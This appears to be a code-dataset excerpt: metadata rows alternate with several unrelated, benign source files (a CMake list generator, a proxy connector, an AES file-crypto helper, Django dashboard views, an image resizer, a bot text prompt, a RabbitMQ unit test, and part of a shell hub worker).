| 30.886525 | 78 | 0.645695 | 1,148 | 8,710 | 4.66115 | 0.135889 | 0.070641 | 0.094749 | 0.067277 | 0.642123 | 0.599514 | 0.527752 | 0.428892 | 0.378621 | 0.340684 | 0 | 0.023596 | 0.206889 | 8,710 | 281 | 79 | 30.996441 | 0.751013 | 0.090815 | 0 | 0.473684 | 0 | 0 | 0.106805 | 0.003326 | 0.005263 | 0 | 0 | 0 | 0.210526 | 1 | 0.089474 | false | 0 | 0.015789 | 0 | 0.136842 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f0b75a340684f3a708d7b4bcb4bfaae6b7e99d | 8,397 | py | Python | cmake/scripts/update_cmakelists.py | patscott/gambit_1.4 | a50537419918089effc207e8b206489a5cfd2258 | [
"Unlicense"
] | 1 | 2019-01-21T19:59:18.000Z | 2019-01-21T19:59:18.000Z | cmake/scripts/update_cmakelists.py | patscott/gambit_1.2 | 19d8ffbe58e1622542eef6c48790fb1a8cf6dd0b | [
"Unlicense"
] | 4 | 2019-10-06T14:03:41.000Z | 2020-08-06T11:53:54.000Z | cmake/scripts/update_cmakelists.py | patscott/gambit_1.4 | a50537419918089effc207e8b206489a5cfd2258 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
#
# GAMBIT: Global and Modular BSM Inference Tool
#*********************************************
# \file
#
# Script to create the CMakeLists.txt files
# for GAMBIT modules.
#
#*********************************************
#
# Authors (add name and date if you modify):
#
# \author Pat Scott
# (patscott@physics.mcgill.ca)
# \date 2014 Nov
#
# \author Ben Farmer
# (b.farmer@imperial.ac.uk)
# \date 2018 Oct
#
#*********************************************
import os
toolsfile="./Utils/scripts/harvesting_tools.py"
exec(compile(open(toolsfile, "rb").read(), toolsfile, 'exec')) # Python 2/3 compatible version of 'execfile'
# Search the source tree to determine which modules are present
def module_census(verbose,install_dir,excludes):
modules=[]
for root,dirs,files in os.walk(install_dir):
for mod in dirs:
exclude = False
for x in excludes:
if mod.startswith(x): exclude = True
if not exclude and mod.lower().find("bit") != -1 and mod.lower().find(".dsym") == -1:
if verbose: print("Located GAMBIT module '{0}'.".format(mod))
modules+=[mod]
break
return modules
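# Illustrative result (actual contents depend on the source tree): calling
# module_census(True, ".", {"ScannerBit"}) returns the top-level directories
# whose names contain "bit", e.g. ["DarkBit", "ColliderBit", "FlavBit"],
# while skipping anything that starts with an excluded prefix.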
def hidden(filename):
return (filename.endswith("~") or filename.startswith("."))
# Actual updater program
def main(argv):
# Lists of modules to exclude; anything starting with one of these strings is excluded.
exclude_modules=set(["ScannerBit"])
# List of printers to exclude; subdirectories within the Printers directory
# that match these strings will be ignored.
exclude_printers=set([]) # -Ditch'ed printers
# List of models to exclude; files within the Models/models directories
# that match these strings will be ignored.
exclude_models=set([]) # -Ditch'ed models
# List of backends to exclude; subdirectories within the Backends/frontends directories
# that match these strings will be ignored.
exclude_backends=set([]) # -Ditch'ed backends
# Handle command line options
verbose = False
try:
opts, args = getopt.getopt(argv,"vx:",["verbose","exclude-modules="])
except getopt.GetoptError:
print('Usage: update_cmakelists.py [flags]')
print(' flags:')
print(' -v : More verbose output')
print(' -x module1,backendA,printer2,modelX,... : Exclude module1, backendA, printer2, modelX, etc.')
sys.exit(2)
for opt, arg in opts:
if opt in ('-v','--verbose'):
verbose = True
print('update_cmakelists.py: verbose=True')
elif opt in ('-x','--exclude','--exclude'):
exclude_modules.update(neatsplit(",",arg))
exclude_printers.update(neatsplit(",",arg))
exclude_models.update(neatsplit(",",arg))
exclude_backends.update(neatsplit(",",arg))
# Find all the modules.
modules = module_census(verbose,".",exclude_modules)
# Add the Backends, Models and Printers dirs only if present
for x in ["Backends", "Models", "Printers"]:
if os.path.isdir(x): modules += [x]
# Loop over the found modules.
for mod in modules:
# Clear the excluded components
excluded_components = set([])
# Retrieve the list of module source files.
srcs = []
for root,dirs,files in os.walk("./"+mod+"/src"):
current_dirname = os.path.basename(os.path.normpath(root))
if mod=="Printers" and excluded(current_dirname, exclude_printers):
if verbose: print(" Ignoring source files for printer {0}".format(current_dirname))
continue # skip this directory
for name in files:
if (name.endswith(".c") or name.endswith(".cc") or name.endswith(".cpp")) and not hidden(name):
short_root = re.sub("\\./"+mod+"/src/?","",root)
if short_root != "" : short_root += "/"
if mod in ["Backends", "Models"] and "/backend_types/" not in short_root and excluded(name, exclude_backends | exclude_models):
if verbose: print(" Ignoring {0} source file '{1}'".format(mod,short_root+name))
excluded_components.add(os.path.splitext(name)[0])
continue # skip this file
if verbose: print(" Located {0} source file '{1}'".format(mod,short_root+name))
srcs+=[short_root+name]
# Retrieve the list of module header files.
headers = []
for root,dirs,files in os.walk("./"+mod+"/include"):
current_dirname = os.path.basename(os.path.normpath(root))
if mod=="Printers" and excluded(current_dirname, exclude_printers):
if verbose: print(" Ignoring header files for printer {0}".format(current_dirname))
excluded_components.add(current_dirname)
continue # skip this directory
for name in files:
short_root = re.sub("\\./"+mod+"/include/?","",root)
if short_root != "" : short_root += "/"
if mod in ["Backends", "Models", "Printers"] and "/backend_types/" not in short_root and excluded(name, exclude_backends | exclude_models | exclude_printers):
if verbose: print(" Ignoring {0} header file '{1}'".format(mod,short_root+name))
excluded_components.add(os.path.splitext(name)[0])
continue # skip this file
if (name.endswith(".h") or name.endswith(".hh") or name.endswith(".hpp")) and not hidden(name):
if verbose: print(" Located {0} header file '{1}'".format(mod,short_root+name))
headers+=[short_root+name]
# Make a candidate CMakeLists.txt file for this module.
towrite = "\
# GAMBIT: Global and Modular BSM Inference Tool \n\
#***********************************************\n\
# \\file \n\
# \n\
# CMake list of source and header files in \n"
if (mod == "Backends"):
towrite += "\
# GAMBIT backends directory. \n"
elif (mod == "Printers"):
towrite += "\
# GAMBIT printers directory. \n"
elif (mod == "Models"):
towrite += "\
# GAMBIT models directory. \n"
else:
towrite += "\
# GAMBIT module "+mod+". \n"
towrite += "\
# \n\
# This file was automatically generated by \n\
# update_cmakelists.py. Do not modify. \n\
# \n\
# Do not add to this if you want to add a new \n\
# source or header file to the make system -- \n\
# just rerun cmake instead. \n\
# \n\
#***********************************************\n\
# \n\
# Authors: \n\
# \n\
# \\author The GAMBIT Collaboration \n\
# \\date "+datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")+"\n\
# \n\
#***********************************************\n\
\n"
if (mod == "Backends"):
towrite += "\
include(../cmake/toy_backends.cmake) \n\n"
towrite += "\
set(source_files \n"
for cpp in srcs: towrite+='src/{0}\n'.format(cpp)
towrite+=")\n\nset(header_files\n"
for hpp in headers: towrite+='include/{0}\n'.format(hpp)
towrite+=")\n\n"
towrite+="add_gambit_library("+mod+" OPTION OBJECT SOURCES ${source_files} HEADERS ${header_files})"
cmakelist = "./"+mod+"/CMakeLists.txt"
candidate = "./scratch/"+mod+"_CMakeLists.txt"
with open(candidate,"w") as f: f.write(towrite)
update_only_if_different(cmakelist, candidate)
if verbose: print("Finished updating module CMakeLists.txt files.")
# Handle command line arguments (verbosity)
if __name__ == "__main__":
main(sys.argv[1:])
| 43.963351 | 174 | 0.532571 | 921 | 8,397 | 4.779587 | 0.266015 | 0.028623 | 0.025443 | 0.019991 | 0.337119 | 0.280781 | 0.272376 | 0.236483 | 0.214902 | 0.172649 | 0 | 0.005708 | 0.31154 | 8,397 | 190 | 175 | 44.194737 | 0.755752 | 0.179231 | 0 | 0.251908 | 0 | 0.007634 | 0.155341 | 0.021774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022901 | false | 0 | 0.007634 | 0.007634 | 0.045802 | 0.145038 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f196b52160cce750e31578f03349f95ed88a03 | 2,262 | py | Python | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | null | null | null | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | null | null | null | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | 1 | 2020-10-19T18:19:02.000Z | 2020-10-19T18:19:02.000Z | from ..base.base_connector import BaseConnector
import json
import requests
class Connector(BaseConnector):
def __init__(self, connection, configuration):
self.is_async = True
self.connection = connection
self.configuration = configuration
self.results_connector = self
self.status_connector = self
self.delete_connector = self
self.query_connector = self
self.ping_connector = self
def ping(self):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/ping",
data=json.dumps({"connection": self.connection, "configuration": self.configuration}))
return response.text
def create_query_connection(self, query):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_query_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "query": query}))
return response.text
def create_results_connection(self, search_id, offset, length):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_results_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id, "offset": offset, "length": length}))
return response.text
def create_status_connection(self, search_id):
response = requests.get("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_status_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id}))
return response.text
def delete_query_connection(self, search_id):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/delete_query_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id}))
return response.text
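# Illustrative usage sketch (host/port values are assumptions, not defaults):
# connection = {"proxy_host": "localhost", "proxy_port": "5000"}
# configuration = {}
# connector = Connector(connection, configuration)
# print(connector.ping())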
| 51.409091 | 179 | 0.648541 | 231 | 2,262 | 6.151515 | 0.160173 | 0.167488 | 0.133709 | 0.130894 | 0.674173 | 0.617171 | 0.574947 | 0.574947 | 0.574947 | 0.527797 | 0 | 0 | 0.217949 | 2,262 | 43 | 180 | 52.604651 | 0.803279 | 0 | 0 | 0.212121 | 0 | 0 | 0.178161 | 0.043767 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f2c2f16d86313bb08782a9e75430ca0c4a6c6a | 1,687 | py | Python | scripts/cryptoConfig.py | lujun495904500/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | 14 | 2019-09-05T09:21:41.000Z | 2022-03-09T03:33:19.000Z | scripts/cryptoConfig.py | tinge666/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | null | null | null | scripts/cryptoConfig.py | tinge666/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | 7 | 2019-10-11T03:11:05.000Z | 2021-07-06T08:20:15.000Z | # -*- coding: utf-8 -*-
import sys,getopt,os,re
from enum import Enum
from toolkits import tools
REG_DEC_NAME = re.compile(r'(.+)_dec')
def get_configaes():
config = tools.get_scriptconfig()
return config["aes"]["keys"][config["aes"]["confindex"]]
# Encrypt or decrypt a file
def crypto_file(opertype,infile,outfile):
confaes = get_configaes()
if opertype == "E":
tools.encrypto_aes(confaes["key"],confaes["iv"],infile,outfile)
elif opertype == "D":
tools.decrypto_aes(confaes["key"],confaes["iv"],infile,outfile)
# Perform the encryption or decryption operation
def do_crypto(opertype,infile,outfile,*args):
if infile == None and len(args)>0:
infile = args[0]
if infile == None:
print('No input file recognised for encryption or decryption!!!')
sys.exit(3)
# Parse the input file path
findir,finname = os.path.split(infile)
finmain,finext = os.path.splitext(finname)
# Determine the operation type (encrypt or decrypt)
if opertype == "U":
if REG_DEC_NAME.match(finmain):
opertype = "E"
else:
opertype = "D"
# Determine the output file path
if outfile == None:
mpair = REG_DEC_NAME.match(finmain)
if mpair:
outfile = os.path.join(findir,mpair.group(1)+finext)
else:
outfile = os.path.join(findir,finmain+'_dec'+finext)
# Run the encryption/decryption on the file
crypto_file(opertype,infile,outfile)
# Script entry point
if __name__== '__main__' :
opertype = "U"
infile = None
outfile = None
# Parse the command line
try:
opts, args = getopt.getopt(sys.argv[1:], "i:o:ed", ["infile=","outfile=","encode","decode"])
except getopt.GetoptError as err:
print(err)
sys.exit(1)
for o, a in opts:
if o in ("-i", "--infile"):
infile = a
elif o in ("-o", "--outfile"):
outfile = a
elif o in ("-e", "--encode"):
opertype = "E"
elif o in ("-d", "--decode"):
opertype = "D"
# Execute the requested operation
do_crypto(opertype,infile,outfile,*args)
#os.system('pause')
| 21.909091 | 94 | 0.652045 | 240 | 1,687 | 4.479167 | 0.379167 | 0.084651 | 0.07814 | 0.044651 | 0.267907 | 0.126512 | 0.065116 | 0 | 0 | 0 | 0 | 0.004979 | 0.166568 | 1,687 | 76 | 95 | 22.197368 | 0.759602 | 0.060462 | 0 | 0.115385 | 0 | 0 | 0.091545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.057692 | 0 | 0.134615 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f3a603abff4ff065bd92786506d156a661da0c | 6,409 | py | Python | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 24 | 2017-03-19T16:17:37.000Z | 2021-11-07T15:35:33.000Z | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 117 | 2016-04-19T12:35:10.000Z | 2022-02-22T13:19:05.000Z | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 11 | 2017-08-08T12:11:39.000Z | 2021-12-08T05:34:06.000Z | import datetime
from django.db.models import Q
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from reversion.models import Revision
from devicegroups.models import Devicegroup
from devices.forms import LendForm
from devices.models import Device
from devices.models import Lending
from locations.models import Section
from main.models import WIDGETS
from main.models import DashboardWidget
from main.models import get_progresscolor
from network.models import IpAddress
from users.models import Lageruser
def get_widget_data(user, widgetlist=[], only_user=False):
context = {}
context["today"] = datetime.date.today()
departments = None
if only_user:
departments = user.departments.all()
if "statistics" in widgetlist:
if departments:
devices = Device.active().filter(department__in=departments)
else:
devices = Device.active()
context['device_all'] = devices.count()
if context['device_all'] != 0:
context['device_available'] = Device.active().filter(currentlending=None).count()
context["device_percent"] = 100 - int(
float(context["device_available"]) / context["device_all"] * 100
)
context["device_percentcolor"] = get_progresscolor(context["device_percent"])
context['ipaddress_all'] = IpAddress.objects.all().count()
if context['ipaddress_all'] != 0:
context['ipaddress_available'] = IpAddress.objects.filter(device=None).count()
context["ipaddress_percent"] = 100 - int(
float(context["ipaddress_available"]) / context["ipaddress_all"] * 100
)
context["ipaddress_percentcolor"] = get_progresscolor(context["ipaddress_percent"])
if "edithistory" in widgetlist:
if only_user:
revisions = Revision.objects.filter(user=user)
else:
revisions = Revision.objects.all()
context['revisions'] = (
revisions
.select_related('user')
.prefetch_related('version_set', 'version_set__content_type')
.order_by("-date_created")[:20]
)
if "newestdevices" in widgetlist:
if departments:
devices = Device.objects.filter(department__in=departments)
else:
devices = Device.objects.all()
context['newest_devices'] = devices.order_by("-pk")[:10]
if "overdue" in widgetlist:
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["overdue"] = lendings.filter(duedate__lt=context["today"], returndate=None).order_by("duedate")[:10]
if "groups" in widgetlist:
context["groups"] = Devicegroup.objects.all()
if "sections" in widgetlist:
context["sections"] = Section.objects.all()
if "recentlendings" in widgetlist:
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["recentlendings"] = lendings.all().order_by("-pk")[:10]
if "shorttermdevices" in widgetlist:
context['shorttermdevices'] = Device.objects.filter(templending=True)[:10]
if "bookmarks" in widgetlist:
context["bookmarks"] = user.bookmarks.all()[:10]
if "returnsoon" in widgetlist:
soon = context["today"] + datetime.timedelta(days=10)
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["returnsoon"] = lendings.filter(
duedate__lte=soon,
duedate__gt=context["today"],
returndate=None
).order_by("duedate")[:10]
return context
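# Widget names recognised above: statistics, edithistory, newestdevices,
# overdue, groups, sections, recentlendings, shorttermdevices, bookmarks,
# returnsoon. Illustrative call (user is assumed to be a Lageruser instance):
# context = get_widget_data(user, ["statistics", "overdue"], only_user=True)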
class Home(TemplateView):
template_name = "home.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.user.is_staff:
context["widgets_left"] = DashboardWidget.objects.filter(user=self.request.user, column="l").order_by("index")
context["widgets_right"] = DashboardWidget.objects.filter(user=self.request.user, column="r").order_by("index")
userwidget_list = dict(WIDGETS)
widgetlist = [x[0] for x in DashboardWidget.objects.filter(user=self.request.user).values_list("widgetname")]
context.update(get_widget_data(self.request.user, widgetlist, only_user=True))
for w in context["widgets_left"]:
if w.widgetname in userwidget_list:
del userwidget_list[w.widgetname]
else:
w.delete()
for w in context["widgets_right"]:
if w.widgetname in userwidget_list:
del userwidget_list[w.widgetname]
else:
w.delete()
context["widgets_list"] = userwidget_list
context["lendform"] = LendForm()
context["lendform"].fields["device"].choices = [
[device[0], str(device[0]) + " - " + device[1]] for device in (
Device
.devices_for_departments(self.request.user.departments.all())
.filter(trashed=None, currentlending=None, archived=None)
.values_list('id', 'name')
)
]
context["lendform"].fields["device"].choices.insert(0, ["", "---------"])
context["userlist"] = Lageruser.objects.filter(is_active=True).values(
"pk", "username", "first_name", "last_name")
context["breadcrumbs"] = [("", _("Dashboard"))]
else:
if self.request.user.is_authenticated:
redirect("userprofile")
return context
| 43.598639 | 123 | 0.62303 | 662 | 6,409 | 5.859517 | 0.223565 | 0.034029 | 0.047435 | 0.04331 | 0.345965 | 0.288734 | 0.269142 | 0.233308 | 0.184326 | 0.184326 | 0 | 0.00735 | 0.256982 | 6,409 | 146 | 124 | 43.89726 | 0.807224 | 0 | 0 | 0.246269 | 0 | 0 | 0.126853 | 0.007333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.119403 | 0 | 0.164179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f51c9fc3d3f7af3c6e3bb4e74a7006b381b69f | 744 | py | Python | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | import cv2 as cv
import PIL
import pathlib
basepath = pathlib.Path(".")
image_files = basepath.glob("*.jpg")
for image in image_files:
img = cv.imread(str(image), cv.IMREAD_UNCHANGED)
print('Original Dimensions : ',img.shape)
scale_percent = 50 # percent of original size
width = int(img.shape[1] * scale_percent / 100)
height = int(img.shape[0] * scale_percent / 100)
dim = (width, height)
# resize image (INTER_AREA is the interpolation OpenCV recommends for shrinking)
resized = cv.resize(img, dim, interpolation = cv.INTER_AREA)
print('Resized Dimensions : ',resized.shape)
cv.imshow("Resized image", resized)
cv.waitKey(0)
cv.imwrite(str(image)[:-4] + "_resized_50.jpg",resized)
cv.destroyAllWindows() | 28.615385 | 65 | 0.634409 | 95 | 744 | 4.873684 | 0.463158 | 0.051836 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026455 | 0.237903 | 744 | 26 | 66 | 28.615385 | 0.790123 | 0.049731 | 0 | 0 | 0 | 0 | 0.113235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f5f6684a2b68cc98dc49e32e0abfeb4df28f28 | 1,621 | py | Python | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 388 | 2019-05-07T15:53:21.000Z | 2022-03-28T20:29:46.000Z | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 1,286 | 2019-05-07T23:38:19.000Z | 2022-03-31T10:44:16.000Z | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 168 | 2019-05-14T20:23:25.000Z | 2022-03-16T06:49:14.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from typing import Dict
from botbuilder.core import TurnContext
from botbuilder.schema import ActivityTypes
from .prompt import Prompt
from .prompt_options import PromptOptions
from .prompt_recognizer_result import PromptRecognizerResult
class TextPrompt(Prompt):
async def on_prompt(
self,
turn_context: TurnContext,
state: Dict[str, object],
options: PromptOptions,
is_retry: bool,
):
if not turn_context:
raise TypeError("TextPrompt.on_prompt(): turn_context cannot be None.")
if not options:
raise TypeError("TextPrompt.on_prompt(): options cannot be None.")
if is_retry and options.retry_prompt is not None:
await turn_context.send_activity(options.retry_prompt)
else:
if options.prompt is not None:
await turn_context.send_activity(options.prompt)
async def on_recognize(
self,
turn_context: TurnContext,
state: Dict[str, object],
options: PromptOptions,
) -> PromptRecognizerResult:
if not turn_context:
raise TypeError(
"DateTimePrompt.on_recognize(): turn_context cannot be None."
)
result = PromptRecognizerResult()
if turn_context.activity.type == ActivityTypes.message:
message = turn_context.activity
if message.text is not None:
result.succeeded = True
result.value = message.text
return result
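# Minimal usage sketch (assumes a DialogSet named dialogs and a
# WaterfallStepContext named step_context; MessageFactory comes from
# botbuilder.core):
# dialogs.add(TextPrompt("name_prompt"))
# await step_context.prompt(
#     "name_prompt",
#     PromptOptions(prompt=MessageFactory.text("What is your name?")),
# )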
| 33.081633 | 83 | 0.653917 | 176 | 1,621 | 5.886364 | 0.352273 | 0.106178 | 0.034749 | 0.030888 | 0.370656 | 0.277992 | 0.220077 | 0.220077 | 0.220077 | 0.220077 | 0 | 0 | 0.280691 | 1,621 | 48 | 84 | 33.770833 | 0.888508 | 0.054904 | 0 | 0.25 | 0 | 0 | 0.103336 | 0.049706 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fa57cad2a22e798ce52adb1551a2a820b1ee04 | 2,303 | py | Python | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Classification (U)
"""Program: rabbitmqcon_ack.py
Description: Unit test of rabbitmqcon.ack in rabbitmq_class.py.
Usage:
test/unit/rabbitmq_class/rabbitmqcon_ack.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import rabbitmq_class
import version
__version__ = version.__version__
class Ack(object):
"""Class: Ack
Description: Class stub holder for pika class.
Methods:
__init__
basic_ack
"""
def __init__(self):
"""Function: __init__
Description: Stub holder for __init__ function.
Arguments:
"""
self.delivery_tag = None
def basic_ack(self, delivery_tag):
"""Function: basic_ack
Description: Stub holder for basic_ack function.
Arguments:
delivery_tag
"""
self.delivery_tag = delivery_tag
return True
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_ack
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.name = None
self.host = "ServerName"
self.port = 5555
self.connection = None
self.exchange_name = "Exchange_Name"
self.queue_name = "Queue_Name"
self.routing_key = "Route_Key"
self.auto_delete = True
self.body = "Message_Body"
@mock.patch("rabbitmq_class.pika")
def test_ack(self, mock_pika):
"""Function: test_ack
Description: Test ack method.
Arguments:
"""
mock_pika.PlainCredentials.return_value = "PlainCredentials"
mock_pika.ConnectionParameters.return_value = "ConnectionParameters"
mock_pika.BasicProperties.return_value = True
rmq = rabbitmq_class.RabbitMQCon(self.name, "xxxxx")
rmq.channel = Ack()
self.assertFalse(rmq.ack("tag"))
if __name__ == "__main__":
unittest.main()
| 17.580153 | 76 | 0.623969 | 249 | 2,303 | 5.502008 | 0.373494 | 0.047445 | 0.028467 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004255 | 0.285714 | 2,303 | 130 | 77 | 17.715385 | 0.828571 | 0.34607 | 0 | 0 | 0 | 0 | 0.096824 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.105263 | false | 0 | 0.184211 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fae303e69fe17c6a7e39236d3b31298320aa3c | 10,693 | py | Python | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 6 | 2017-08-24T00:34:30.000Z | 2022-01-16T21:29:22.000Z | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 9 | 2021-03-31T18:50:47.000Z | 2022-01-09T23:20:02.000Z | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 13 | 2017-09-21T18:17:02.000Z | 2022-02-21T04:29:25.000Z | import sys
import time
import logging
import gevent
import gevent.socket
import mist.api.exceptions
import mist.api.shell
import mist.api.hub.main
import mist.api.users.models
import mist.api.logs.methods
from mist.api.misc.shell import ShellCapture
from mist.api import config
log = logging.getLogger(__name__)
class ShellHubWorker(mist.api.hub.main.HubWorker):
def __init__(self, *args, **kwargs):
super(ShellHubWorker, self).__init__(*args, **kwargs)
self.shell = None
self.channel = None
for key in ('owner_id', 'cloud_id', 'machine_id', 'host',
'columns', 'rows'):
# HACK:FIXME: Temporary fix for Orchestration shell.
# Add a new, dedicated ShellHubWorker for Orchestration logs.
if key in ('host', 'cloud_id', 'machine_id', ):
if self.params.get('job_id'):
continue
if not self.params.get(key):
err = "%s: Param '%s' missing from worker kwargs." % (self.lbl,
key)
log.error(err)
self.stop()
raise Exception(err)
self.provider = ''
self.owner = mist.api.users.models.Owner(id=self.params['owner_id'])
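# Illustrative params payload expected by this worker (values are assumptions):
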